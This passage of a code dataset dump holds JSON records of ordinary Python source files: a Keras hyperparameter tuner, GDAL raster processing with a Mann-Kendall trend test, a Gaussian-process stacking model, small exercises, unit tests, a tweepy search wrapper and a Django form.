metric to optimize for. The referenced\n metric must be part of the the `compile()` metrics.\n\n Attributes:\n epoch_budget (int, optional): how many epochs to hypertune for.\n Defaults to 100.\n\n max_budget (int, optional): how many epochs to spend at most on\n a given model. Defaults to 10.\n\n min_budget (int, optional): how many epochs to spend at least on\n a given model. Defaults to 3.\n\n num_executions(int, optional): number of execution for each model.\n Defaults to 1.\n\n project (str, optional): project the tuning belong to.\n Defaults to 'default'.\n\n architecture (str, optional): Name of the architecture tuned.\n Default to 'default'.\n\n user_info(dict, optional): user supplied information that will be\n recorded alongside training data. Defaults to {}.\n\n label_names (list, optional): Label names for confusion matrix.\n Defaults to None, in which case the numerical labels are used.\n\n max_model_parameters (int, optional):maximum number of parameters\n allowed for a model. Prevent OOO issue. Defaults to 2500000.\n\n checkpoint (Bool, optional): Checkpoint model. Setting it to false\n disable it. Defaults to True\n\n dry_run(bool, optional): Run the tuner without training models.\n Defaults to False.\n\n debug(bool, optional): Display debug information if true.\n Defaults to False.\n\n display_model(bool, optional):Display model summary if true.\n Defaults to False.\n\n results_dir (str, optional): Tuning results dir.\n Defaults to results/. Can specify a gs:// path.\n\n tmp_dir (str, optional): Temporary dir. Wiped at tuning start.\n Defaults to tmp/. Can specify a gs:// path.\n\n export_dir (str, optional): Export model dir. Defaults to export/.\n Can specify a gs:// path.\n\n FIXME:\n - Deal with early stop correctly\n - allows different halving ratio for epochs and models\n - allows differnet type of distribution\n\n \"\"\"\n\n super(UltraBand, self).__init__(model_fn, objective, \"UltraBand\",\n RandomDistributions, **kwargs)\n\n self.config = UltraBandConfig(kwargs.get('ratio',\n 3), self.state.min_epochs,\n self.state.max_epochs,\n self.state.epoch_budget)\n\n self.epoch_budget_expensed = 0\n\n settings = {\n \"Epoch Budget\": self.state.epoch_budget,\n \"Num Models Sequence\": self.config.model_sequence,\n \"Num Epochs Sequence\": self.config.epoch_sequence,\n \"Num Brackets\": self.config.num_brackets,\n \"Number of Iterations\": self.config.num_batches,\n \"Total Cost per Band\": self.config.total_epochs_per_band\n }\n\n section('UltraBand Tuning')\n subsection('Settings')\n display_settings(settings)\n\n def __load_instance(self, instance_state):\n if self.state.dry_run:\n return None\n\n # Determine the weights file (if any) to load, and rebuild the model.\n weights_file = None\n\n if instance_state.execution_states_collection:\n esc = instance_state.execution_states_collection\n execution_state = esc.get_last()\n weights_file = get_weights_filename(self.state, instance_state,\n execution_state)\n if not tf.io.gfile.exists(weights_file):\n warning(\"Could not open weights file: '%s'\" % weights_file)\n weights_file = None\n\n model = instance_state.recreate_model(weights_filename=weights_file)\n\n return Instance(instance_state.idx,\n model,\n instance_state.hyper_parameters,\n self.state,\n self.cloudservice,\n instance_state=instance_state)\n\n def __train_instance(self, instance, x, y, **fit_kwargs):\n tf_utils.clear_tf_session()\n\n # Reload the Instance\n instance = self.__load_instance(instance)\n\n # Fit the model\n if not self.state.dry_run:\n instance.fit(x, y, **fit_kwargs)\n\n def __train_bracket(self, instance_collection, num_epochs, x, y,\n **fit_kwargs):\n \"Train all the models that are in a given bracket.\"\n num_instances = len(instance_collection)\n\n info('Training %d models for %d epochs.' % (num_instances, num_epochs))\n for idx, instance in enumerate(instance_collection.to_list()):\n info(' Training: %d/%d' % (idx, num_instances))\n self.__train_instance(instance,\n x,\n y,\n epochs=num_epochs,\n **fit_kwargs)\n\n def __filter_early_stops(self, instance_collection, epoch_target):\n filtered_instances = []\n for instance in instance_collection:\n last_execution = instance.execution_states_collection.get_last()\n if not last_execution.metrics or not last_execution.metrics.exist(\n \"loss\"):\n info(\"Skipping instance %s - no metrics.\" % instance.idx)\n continue\n metric = last_execution.metrics.get(\"loss\")\n epoch_history_len = len(metric.history)\n if epoch_history_len < epoch_target:\n info(\"Skipping instance %s - history is only %d epochs long - \"\n \"expected %d - assuming early stop.\" %\n (instance.idx, epoch_history_len, epoch_target))\n continue\n\n filtered_instances.append(instance)\n return filtered_instances\n\n def bracket(self, instance_collection, num_to_keep, num_epochs,\n total_num_epochs, x, y, **fit_kwargs):\n output_collection = InstanceStatesCollection()\n if self.state.dry_run:\n for i in range(num_to_keep):\n output_collection.add(i, None)\n return output_collection\n\n self.__train_bracket(instance_collection, num_epochs, x, y,\n **fit_kwargs)\n instances = instance_collection.sort_by_objective()\n instances = self.__filter_early_stops(instances, total_num_epochs)\n\n if len(instances) > num_to_keep:\n instances = instances[:num_to_keep]\n info(\"Keeping %d instances out of %d\" %\n (len(instances), len(instance_collection)))\n\n output_collection = InstanceStatesCollection()\n for instance in instances:\n output_collection.add(instance.idx, instance)\n return output_collection\n\n def search(self, x, y, **kwargs):\n assert 'epochs' not in kwargs, \\\n \"Number of epochs is controlled by the tuner.\"\n remaining_batches = self.config.num_batches\n\n while remaining_batches > 0:\n info('Budget: %s/%s - Loop %.2f/%.2f' %\n (self.epoch_budget_expensed, self.state.epoch_budget,\n remaining_batches, self.config.num_batches))\n\n # Last (fractional) loop\n if remaining_batches < 1.0:\n # Reduce the number of models for the last fractional loop\n model_sequence = self.config.partial_batch_epoch_sequence\n if model_sequence is None:\n break\n info('Partial Batch Model Sequence %s' % model_sequence)\n else:\n model_sequence = self.config.model_sequence\n\n # Generate N models, and perform the initial training.\n subsection('Generating %s models' % model_sequence[0])\n candidates = InstanceStatesCollection()\n num_models = model_sequence[0]\n\n for idx in tqdm(range(num_models),\n desc='Generating models',\n unit='model'):\n\n if self.state.dry_run:\n candidates.add(idx, None)\n else:\n instance = self.new_instance()\n if instance is not None:\n candidates.add(instance.state.idx, instance.state)\n\n if not candidates:\n info(\"No models were generated.\")\n break\n\n subsection(\"Training models.\")\n\n for bracket_idx, num_models in enumerate(model_sequence):\n num_epochs = self.config.delta_epoch_sequence[bracket_idx]\n total_num_epochs = self.config.epoch_sequence[bracket_idx]\n\n num_to_keep = 0\n if bracket_idx < len(model_sequence) - 1:\n num_to_keep = model_sequence[bracket_idx + 1]\n info(\"Running a bracket to reduce from %d to %d models \"\n \"in %d epochs\" %\n (num_models, num_to_keep, num_epochs))\n else:\n num_to_keep = model_sequence[bracket_idx]\n info(\"Running final bracket - %d models for %d epochs\" %\n (num_to_keep, num_epochs))\n\n info('Budget: %s/%s - Loop %.2f/%.2f - Brackets %s/%s' %\n (self.epoch_budget_expensed, self.state.epoch_budget,\n remaining_batches, self.config.num_batches,\n bracket_idx + 1, self.config.num_brackets))\n\n self.epoch_budget_expensed += num_models * num_epochs\n\n candidates = self.bracket(candidates, num_to_keep, num_epochs,\n total_num_epochs, x, y, **kwargs)\n\n remaining_batches -= 1\n\n info('Final Budget Used: %s/%s' %\n (self.epoch_budget_expensed, self.state.epoch_budget))\n","sub_path":"kerastuner/tuners/ultraband/ultraband.py","file_name":"ultraband.py","file_ext":"py","file_size_in_byte":11884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"185654645","text":"# -*- coding: utf-8 -*-\n\n\n# 元素記号\n# \"Hi He Lied Because Boron Could Not Oxidize Fluorine.\n# New Nations Might Also Sign Peace Security Clause. Arthur King Can.\"\n# という文を単語に分解し,1, 5, 6, 7, 8, 9, 15, 16, 19番目の単語は先頭の\n# 1文字,それ以外の単語は先頭に2文字を取り出し,取り出した文字列から\n# 単語の位置(先頭から何番目の単語か)への\n# 連想配列(辞書型もしくはマップ型)を作成せよ.\n\n\nsentence = \"Hi He Lied Because Boron Could Not Oxidize Fluorine. New Nations Might Also Sign Peace Security Clause. Arthur King Can.\"\n\n#上のsentenceをwordごとに区切って並べる。\nwords = sentence.split(\" \")\n\n#上のwordsそれぞれから,と.を取り除く。\n# for word in words:\n# word_stripped = word.strip(\",.\")\n\n# made an empty dictionary to put key/value later.\ndict_w1 = {}\n\n# 先頭1文字の単語のリストを作って、それぞれの先頭1文字を上のdict_w1に入れる。\nfor i in [0,4,5,6,7,8,14,15,18]:\n #words[i]の先頭の1文字をw1にする。\n w1 = words[i][0]\n #[w1]は先頭の1文字。dict_w1はdictionary。i+1は何番目に出てくるか。\n #dict_w1[w1]は、例えばdict_w1[H]で、=1となる(Hi)。\n dict_w1[w1] = i+1\n# w2 = words[4][0]\n# w3 = words[5][0]\n# w4 = words[6][0]\n# w5 = words[7][0]\n# w6 = words[8][0]\n# w7 = words[14][0]\n# w8 = words[15][0]\n# w9 = words[18][0]\nprint(dict_w1)\n#{w1:1, w2:5, w3:6, w4:7, w5:8, w6:9, w7:15, w8:16, w9:19}\n\n#2,3,4,10,11,12,13,14,17,18,20\ndict_w2 = {}\n\nfor i in [1,2,3,9,10,11,11,12,13,16,17,19]:\n w2 = words[i][:2]\n dict_w2[w2] = i+1\nprint(dict_w2)\n# w10 = words[1][1]\n# w11= words[2][1]\n# w12 = words[3][1]\n# w13 = words[9][1]\n# w14 = words[10][1]\n# w15 = words[11][1]\n# w16 = words[12][1]\n# w17 = words[13][1]\n# w18= words[16][1]\n# w19= words[17][1]\n# w20= words[19][1]\n#\n# {w10:2, w11:3, w12:4, w13:10, w14:11, w15:12, w16:13, w17:14, w18:17, w19:18, w20:20}\n\n","sub_path":"yui/chapter01/knock04.py","file_name":"knock04.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"4849941","text":"# Load standard libaries\r\nimport copy\r\nimport dill\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom math import modf\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\nfrom mdls.funs_gp import gp_wrapper, gp_real\r\n\r\n# di_model={'base':'rxgboost', 'nval':'168',\r\n# 'max_iter':'10', 'lr':'0.01', 'max_cg':'10000',\r\n# 'n_trees':'100', 'depth':'3', 'n_jobs':'7'}\r\n# self = model(encoder=enc_yX,di_model=di_model)\r\n# self.fit(Xtrain, ytrain)\r\nclass model():\r\n def __init__(self, encoder, di_model=None):\r\n self.encoder = encoder\r\n self.di_model = {'base':'xgboost', 'nval':168, # Number of validation points\r\n 'max_iter':250, 'lr':0.01, 'max_cg':10000} # defaults\r\n # Model arguments either strings, floats, ints, or not part of default (left as string)\r\n if di_model is not None:\r\n for k in di_model.keys():\r\n if k in self.di_model:\r\n try:\r\n val_k = float(di_model[k])\r\n frac, _ = modf(val_k)\r\n if frac == 0:\r\n val_k = int(val_k)\r\n self.di_model[k] = val_k\r\n except:\r\n assert isinstance(di_model[k],str)\r\n self.di_model[k] = di_model[k] \r\n else:\r\n self.di_model[k] = di_model[k] # Argument for base\r\n mclass = __import__('mdls.' + self.di_model['base'])\r\n self.base = getattr(getattr(mclass, self.di_model['base']), 'model')\r\n self.base = self.base(encoder=self.encoder, di_model=self.di_model)\r\n\r\n # X, y = Xtrain.copy(), ytrain.copy()\r\n def fit(self, X, y):\r\n ntot = len(X)\r\n assert ntot == len(y)\r\n nval = self.di_model['nval']\r\n lr = self.di_model['lr']\r\n max_iter = self.di_model['max_iter']\r\n max_cg = self.di_model['max_cg']\r\n # --- (i) Fit the baseline model --- #\r\n print('(i) Fitting baseline model')\r\n if nval > 0:\r\n X_train, y_train = X[:-nval], y[:-nval]\r\n #X_val, y_val = X[-nval:], y[-nval:]\r\n else:\r\n X_train, y_train = X, y\r\n #X_val, y_val = None, None\r\n self.base.fit(y=y_train, X=X_train)\r\n Eta, Ytil = self.base.predict(X=X, y=y)\r\n assert Eta.shape == Ytil.shape\r\n self.k = Ytil.shape[1]\r\n # Fill missing values with predicted scores\r\n Ytil = np.where(np.isnan(Ytil),Eta, Ytil)\r\n # Normalize the Y's\r\n self.enc_Y = StandardScaler().fit(Ytil)\r\n Eta = self.enc_Y.transform(Eta)\r\n Ytil = self.enc_Y.transform(Ytil)\r\n # Split the nval\r\n if nval > 0:\r\n Eta_val, Ytil_val = Eta[-nval:], Ytil[-nval:]\r\n Eta_train, Ytil_train = Eta[:-nval], Ytil[:-nval]\r\n else:\r\n Eta_val, Ytil_val = None, None\r\n\r\n # --- (ii) GP Stacker --- #\r\n print('(ii) Fitting GP')\r\n self.gp = gp_wrapper(gp_class=gp_real, train_x=Eta_train, train_y=Ytil_train, tt='list')\r\n self.gp.fit(x_val=Eta_val, y_val=Ytil_val, max_iter=max_iter, max_cg=max_cg, lr=lr)\r\n # Refit baseline model\r\n print('Refitting baseline')\r\n self.base.fit(y=y, X=X)\r\n self.update_Xy(Xnew=X, ynew=y)\r\n\r\n # Xnew=X.copy(); ynew=y.copy()\r\n def update_Xy(self, Xnew, ynew):\r\n print('Updating GP X/Y')\r\n # (i) New pandas df to get yhats from xgboost\r\n Eta, Ytil = self.base.predict(X=Xnew, y=ynew)\r\n Ytil = np.where(np.isnan(Ytil), Eta, Ytil)\r\n self.enc_Y.fit(Ytil)\r\n Eta = self.enc_Y.transform(Eta)\r\n Ytil = self.enc_Y.transform(Ytil)\r\n # (ii) Update X/y within GP\r\n tmp_di = self.gp.model.state_dict()\r\n self.gp = gp_wrapper(gp_class=gp_real, train_x=Eta, train_y=Ytil, tt='list')\r\n self.gp.model.load_state_dict(tmp_di)\r\n \r\n\r\n # X = X_now.copy(); #Xtrain[-(lag+2):].copy()\r\n def predict(self, X):\r\n # Get predictions from baseline model\r\n Eta = self.base.predict(X=X)\r\n assert Eta.shape[1] == self.k\r\n # Normalize and tensorize\r\n Eta = self.enc_Y.transform(Eta)\r\n # Get predictions from multitask GP\r\n mu, se = self.gp.predict(Eta)\r\n df_mu = pd.DataFrame(self.enc_Y.inverse_transform(mu)).assign(tt='pred')\r\n df_se = pd.DataFrame(self.enc_Y.scale_ * se).assign(tt='se')\r\n df = pd.concat([df_mu,df_se],0).rename_axis('idx').reset_index()\r\n df = df.melt(['idx','tt'],None,'lead').pivot_table('value',['lead','idx'],'tt')\r\n df = df.reset_index().assign(lead=lambda x: x.lead+1)\r\n if df.idx.max() == 0:\r\n df.drop(columns = 'idx', inplace=True)\r\n return df\r\n\r\n def pickle_me(self, path):\r\n with open(path, 'wb') as file:\r\n dill.dump(self, file)\r\n\r\n def copy(self):\r\n return copy.deepcopy(self)\r\n\r\n# with open(path, 'rb') as file:\r\n# tmp = dill.load(file)\r\n# tmp.predict(X_now.copy())\r\n\r\n# self.gp = gp_wrapper(gp_class=mgp_real, train_x=Yhat, train_y=Ytil, tt='multi')\r\n# self.gp = gp_wrapper(gp_class=mgp_batch, train_x=Yhat, train_y=Ytil, tt='multi')\r\n# self.gp = gp_wrapper(gp_class=gp_real, train_x=Yhat, train_y=Ytil[:,12], tt='univariate')\r\n\r\n\r\n\r\n # # tmp = pd.concat([self.res_train.drop(columns=['se','idx']), res.assign(tt='test')])\r\n # # tmp = tmp.reset_index(None, True).rename_axis('idx').reset_index()\r\n # # from plotnine import *\r\n # # gg_torch = (ggplot(tmp, aes(x='idx', y='mu', color='tt')) + theme_bw() + geom_line() +\r\n # # geom_vline(xintercept=ntrain) + geom_ribbon(aes(ymin='lb', ymax='ub'), alpha=0.5) +\r\n # # geom_point(aes(x='idx', y='y'), color='black', size=0.5, alpha=0.5))\r\n # # gg_torch.save(os.path.join(dir_figures, 'test.png'),width=12,height=7)\r\n\r\n# for name, param in self.gp.model.named_parameters():\r\n# with torch.no_grad():\r\n# print('param: %s, value: %s' % (name, param.flatten()))\r\n","sub_path":"mdls/gp_stacker.py","file_name":"gp_stacker.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"298604969","text":"import time\n\ninput_words_list =[[\"leave\", [\"leav\", \"eavt\", \"eaaaaaaaaaaaaaaaaaaaaaaaaa\"]],\n [\"reset\", \"rest\"],\n [\"dragoon\", \"dragon\"],\n [\"leave\", \"leave\"],\n [\"sleet\", \"lets\"],\n [\"skiff\", \"ski\"]]\n\n\ndef list_elements_len(*args):\n elements_len = map(len, *args)\n return elements_len\n\n\ndef funnel(word1, *word2):\n if isinstance(word2[0], list):\n word2 = word2[0]\n elif isinstance(word2[0], str):\n word2 = list(word2)\n if len(word1)-1 in list_elements_len(word2):\n for letter_position, _ in enumerate(word1):\n word1_without_letter = word1[:letter_position]+word1[letter_position+1:]\n if word1_without_letter in word2:\n return True\n return False\n\n\ndef duration(func):\n def wrapper(*wor):\n start = time.time()\n func(*wor)\n end = time.time()\n print((end-start))\n return wrapper\n\n\n@duration\ndef my_solution(*input_words):\n for pair in input_words:\n print(funnel(*pair))\n\n\nif __name__ == \"__main__\":\n my_solution(*input_words_list)\n","sub_path":"word_funnel.py","file_name":"word_funnel.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"338962743","text":"import os\r\nimport ogr\r\nimport gdal\r\nimport numpy as np\r\nimport pymannkendall as mk\r\nfrom clip import clip_with_shp\r\nfrom collections import Iterable\r\n\r\n\r\nGRIB_NODATA = -1.797693e+308\r\ncreation = ['TILED=YES', 'COMPRESS=DEFLATE',\r\n 'ZLEVEL=3', 'PREDICTOR=1', 'BIGTIFF=YES']\r\n\r\n\r\n# mann kendall test\r\ndef mk_test(arr):\r\n return mk.original_test(arr).z\r\n\r\n\r\ndef create_tif(filename, ras, values):\r\n if isinstance(ras, str):\r\n ds = gdal.Open(ras)\r\n else:\r\n ds = ras\r\n ras = ds.GetDescription()\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n count = values.shape[2] if len(values.shape) > 2 else 1\r\n out_ds = gdal.GetDriverByName('GTiff').Create(\r\n out_file, ds.RasterXSize, ds.RasterYSize, count, gdal.GDT_Float64, creation)\r\n\r\n out_ds.SetProjection(ds.GetProjection())\r\n out_ds.SetGeoTransform(ds.GetGeoTransform())\r\n for c in range(1, 1 + count):\r\n out_band = out_ds.GetRasterBand(c)\r\n out_band.SetNoDataValue(GRIB_NODATA)\r\n if len(values.shape) > 2:\r\n out_band.WriteArray(values[:, :, c - 1])\r\n else:\r\n out_band.WriteArray(values)\r\n out_band = None\r\n out_ds = None\r\n\r\n\r\ndef proj_ds(ras, shp, clip_shp=None):\r\n if isinstance(ras, str):\r\n ds = gdal.Open(ras)\r\n else:\r\n ds = ras\r\n ras = ds.GetDescription()\r\n\r\n out_file = os.path.join(os.path.dirname(\r\n ras), os.path.splitext(os.path.basename(ras))[0] + '_proj.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n if clip_shp is not None:\r\n clip_ds = clip_with_shp(ras, clip_shp,\r\n out_file='/vsimem/_clip.tif',\r\n rasterize_option=['ALL_TOUCHED=False'])\r\n else:\r\n clip_ds = ds\r\n outDataSet = ogr.Open(shp)\r\n srs = outDataSet.GetLayer().GetSpatialRef()\r\n\r\n option = gdal.WarpOptions(creationOptions=creation,\r\n resampleAlg=gdal.GRA_Average,\r\n multithread=True, dstSRS=srs)\r\n gdal.Warp(out_file, clip_ds, options=option)\r\n\r\n\r\ndef deal_calc(ras, out_path, plus=None, multi=None, **kwargs):\r\n out_file = os.path.join(out_path, os.path.splitext(\r\n os.path.basename(ras))[0] + '.tif')\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n creationOptions=creation, **kwargs)\r\n out_ds = gdal.Warp(out_file, ras, options=option)\r\n for c in range(1, 1 + out_ds.RasterCount):\r\n out_band = out_ds.GetRasterBand(c)\r\n no_data = out_band.GetNoDataValue()\r\n values = out_band.ReadAsArray()\r\n if plus is not None:\r\n values[values != no_data] = values[values != no_data] + plus\r\n if multi is not None:\r\n if isinstance(multi, Iterable):\r\n values[values != no_data] = \\\r\n values[values != no_data] * multi[c - 1]\r\n else:\r\n values[values != no_data] = values[values != no_data] * multi\r\n\r\n out_band.WriteArray(values)\r\n\r\n\r\ndef deal_divide(filename, ds_up, ds_down, ** kwargs):\r\n if isinstance(ds_up, str):\r\n ras_up = ds_up\r\n ds_up = gdal.Open(ds_up)\r\n else:\r\n ras_up = ds_up.GetDescription()\r\n\r\n if isinstance(ds_down, str):\r\n ds_down = gdal.Open(ds_down)\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras_up), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n ds = gdal.Warp(out_file, ds_up, options=option)\r\n ds_up = gdal.Warp('/vsimem/_1.tif', ds_up, options=option)\r\n ds_down = gdal.Warp('/vsimem/_2.tif', ds_down, options=option)\r\n\r\n # change net radiation\r\n col = ds.RasterCount\r\n for c in range(1, col + 1):\r\n band_up = ds_up.GetRasterBand(c)\r\n band_down = ds_down.GetRasterBand(c)\r\n band = ds.GetRasterBand(c)\r\n\r\n up = band_up.ReadAsArray()\r\n down = band_down.ReadAsArray()\r\n\r\n mask = up != band_up.GetNoDataValue()\r\n net = np.copy(up)\r\n net[mask] = up[mask] / down[mask]\r\n band.WriteArray(net)\r\n\r\n # destroy dataset\r\n band = None\r\n ds = None\r\n\r\n\r\ndef deal_cover(filename, ds_up, ds_down, ** kwargs):\r\n if isinstance(ds_up, str):\r\n ras_up = ds_up\r\n ds_up = gdal.Open(ds_up)\r\n else:\r\n ras_up = ds_up.GetDescription()\r\n\r\n if isinstance(ds_down, str):\r\n ds_down = gdal.Open(ds_down)\r\n\r\n if os.path.isdir(os.path.dirname(filename)):\r\n out_file = filename\r\n else:\r\n out_file = os.path.join(os.path.dirname(ras_up), filename)\r\n\r\n if os.path.exists(out_file):\r\n return\r\n\r\n option = gdal.WarpOptions(multithread=True, options=[\"GDAL_CACHE_MAX=128\"],\r\n **kwargs, creationOptions=creation)\r\n ds = gdal.Warp(out_file, ds_up, options=option)\r\n\r\n # change net radiation\r\n col = ds.RasterCount\r\n for c in range(1, col + 1):\r\n band_up = ds_up.GetRasterBand(c)\r\n band_down = ds_down.GetRasterBand(c)\r\n band = ds.GetRasterBand(c)\r\n\r\n up = band_up.ReadAsArray()\r\n down = band_down.ReadAsArray()\r\n\r\n mask = up == band_up.GetNoDataValue()\r\n net = np.copy(down)\r\n net[mask] = band_up.GetNoDataValue()\r\n band.SetNoDataValue(band_up.GetNoDataValue())\r\n band.WriteArray(net)\r\n\r\n # destroy dataset\r\n band = None\r\n ds = None\r\n","sub_path":"mk_test.py","file_name":"mk_test.py","file_ext":"py","file_size_in_byte":5842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"145465226","text":"import time\n\n\ndef get_time_process(target_function):\n start_time = time.time()\n target_function()\n end_time = time.time()\n\n return end_time - start_time\n\n\ndef measure_graph_size(f, *args):\n g = f.get_concrete_function(*args).graph\n print(\"{}({}) contains {} nodes in its graph\".format(\n f.__name__, ', '.join(map(str, args)), len(g.as_graph_def().node)\n ))\n return f\n\n","sub_path":"utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"71329329","text":"import unittest\r\nfrom interval import *\r\nfrom interval.interval_functions import *\r\n\r\n\r\nclass mergeIntervals_test(unittest.TestCase):\r\n \"\"\"Test mergeIntervals\"\"\"\r\n\r\n def overlapping(self):\r\n self.assertEqual(mergeIntervals('(1,5]', '[2,6]').__repr__(), '[2, 6]') # check the result\r\n\r\n def within(self):\r\n self.assertEqual(mergeIntervals('(1,8)', '[4,6]').__repr__(), '[2, 7]') # check the result\r\n\r\n def non_overlapping(self):\r\n with self.assertRaises('No Overlapping'):\r\n mergeIntervals('(0,3)', '[9,15)') # check the result\r\n\r\nclass mergeOverlapping_test(unittest.TestCase):\r\n \"\"\"Test mergeOverlapping\"\"\"\r\n\r\n def basic(self): # check if the function is working\r\n self.string1 = '[1,5), [2,6), (8,10], [8,18]'\r\n self.result1 = ['[1,5]', '[8,18]']\r\n self.string2 = '(0,4), [6,15)'\r\n self.result2 = ['[1,3]', '[6,14]']\r\n\r\n def overlapping_test(self): # check the overlapping case\r\n result = mergeOverlapping(self.string1)\r\n self.assertEqual(len(result),len(self.result1)) # check if the lengths of two list equal\r\n for i in range(0,len(result)):\r\n self.assertEqual(result[i].__repr__(), self.result1[i].__repr__()) # check if elements with same indexes\r\n # are the same\r\n\r\n def non_overlapping_test(self): # check the non_overlapping_case\r\n result_non_overlapping = mergeOverlapping(self.string2)\r\n for i in range(0,len(result_non_overlapping)):\r\n self.assertEqual(result_non_overlapping[i].__repr__(), self.result2[i].__repr__())\r\n # check if elements with same indexes are the same\r\n\r\n\r\nclass insert_test(unittest.TestCase):\r\n \"\"\"Test insert\"\"\"\r\n\r\n def basic(self): # check if the function is working\r\n self.string1 = '[1,3], [6,9]'\r\n self.inserted_interval1 = '[2,5]'\r\n self.result1 = ['[1,9]']\r\n self.string2 = '[1,2], (3,5), [6,7), (8,10], [12,16]'\r\n self.inserted_interval2 = '[4,9]'\r\n self.result2 = ['[1,2]', '[4,10]', '[12,16]']\r\n\r\n def test_insert(self): # check the function in deeper environment\r\n insert_output1 = insert(self.string1, self.inserted_interval1)\r\n insert_output2 = insert(self.string2, self.inserted_interval2)\r\n self.assertEqual(len(insert_output1),len(self.result1)) # check if the lengths of two list equal\r\n self.assertEqual(len(insert_output2),len(self.result2))\r\n for i in range(0,len(insert_output1)):\r\n self.assertEqual(insert_output1[i].__repr__(), self.result1[i].__repr__())\r\n self.assertEqual(insert_output2[i].__repr__(), self.result2[i].__repr__())\r\n # check if elements with same indexes are the same\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"wl1162/unittest.py","file_name":"unittest.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633167687","text":"from collections import namedtuple\n\nAlternative = namedtuple(\"Alternative\", (\"name\", \"code\", \"access\"))\n\n\nclass DictionaryAggregator(object):\n def __init__(self, master_dict, choices):\n self.master = master_dict\n self.choices = choices\n\n def lookup_strings(self, stringset, preferred_language):\n ss = set(stringset)\n\n alt = self.choices.get(preferred_language)\n if not alt:\n return self.master.lookup_strings(ss)\n\n stage1 = alt.access.lookup_strings(ss)\n stage2 = self.master.lookup_strings(ss - set(stage1.keys()))\n stage2.update(stage1)\n\n return stage2\n","sub_path":"captain/dict_aggregator.py","file_name":"dict_aggregator.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"407432321","text":"#!/usr/bin/env python\n\n__author__ = \"bunkdeath\"\n__date__ = \"$Mar 10, 2012 8:05:18 AM$\"\n\nimport tweepy\nimport config as setting\nfrom Parser import TweetParser\n\n\nclass TwitterSearch(object):\n def __init__(self, keyword=None, count=10):\n self.keyword = keyword\n self.count = count\n\n self.auth = tweepy.OAuthHandler(setting.CONSUMER_KEY, setting.CONSUMER_SECRET)\n self.auth.secure = True\n self.auth.set_access_token(setting.ACCESS_TOKEN, setting.ACCESS_TOKEN_SECRET)\n self.api = tweepy.API(self.auth)\n\n self.parser = TweetParser()\n\n def search(self, keyword, count=10):\n if not self.keyword:\n self.keyword = keyword\n\n if count != 10:\n self.count = count\n\n tweets = self.api.search(self.keyword, count=self.count)\n return self.parser.parse_class(tweets)\n","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295964762","text":"from django.forms import ModelForm\nfrom .models import BookOrder\n\n\nclass BookOrderForm(ModelForm):\n\tclass Meta:\n\t\tmodel = BookOrder\n\t\tfields = [\n\t\t\t'date_order',\n\t\t\t'amount',\n\t\t\t'bookstore'\n\t\t]\n\n\t\tlabels = {\n\t\t\t'date_order': 'ວັນເດືອນປີສັ່ງຊື້ປື້ມ',\n\t\t\t'amount': 'ຈຳນວນ',\n\t\t\t'bookstore': 'ຮ້ານຂາຍປື້ມ',\n\t\t}","sub_path":"django_all/bookorder/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"613780424","text":"#\n# Collective Knowledge (pipeline demo)\n#\n# See CK LICENSE.txt for licensing details\n# See CK COPYRIGHT.txt for copyright details\n#\n# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net\n#\n\ncfg={} # Will be updated by CK (meta description of this module)\nwork={} # Will be updated by CK (temporal data)\nck=None # Will be updated by CK (initialized CK kernel) \n\n# Local settings\n\n##############################################################################\n# Initialize module\n\ndef init(i):\n \"\"\"\n\n Input: {}\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n return {'return':0}\n\n##############################################################################\n# run pipeline\n\ndef pipeline(i):\n \"\"\"\n Input: {\n (cmd) - cmd\n (compiler_vars) - will substitute dummies $#VAR#$ in cmd\n (compiler_flags) - assemble into string and substitute $#compiler_flags#$\n }\n\n Output: {\n return - return code = 0, if successful\n > 0, if error\n (error) - error text if return > 0\n }\n\n \"\"\"\n\n import json\n import os\n\n o=i.get('out','')\n\n cmd=i.get('cmd','')\n\n cpu_freq=str(i.get('cpu_freq',''))\n gpu_freq=str(i.get('gpu_freq',''))\n\n cv=i.get('compiler_vars',{})\n cf=i.get('compiler_flags',{})\n\n if o=='con':\n ck.out('')\n ck.out(' Pipeline started')\n ck.out('')\n ck.out(' Input \"compiler_vars\" ='+json.dumps(cv))\n ck.out(' Input 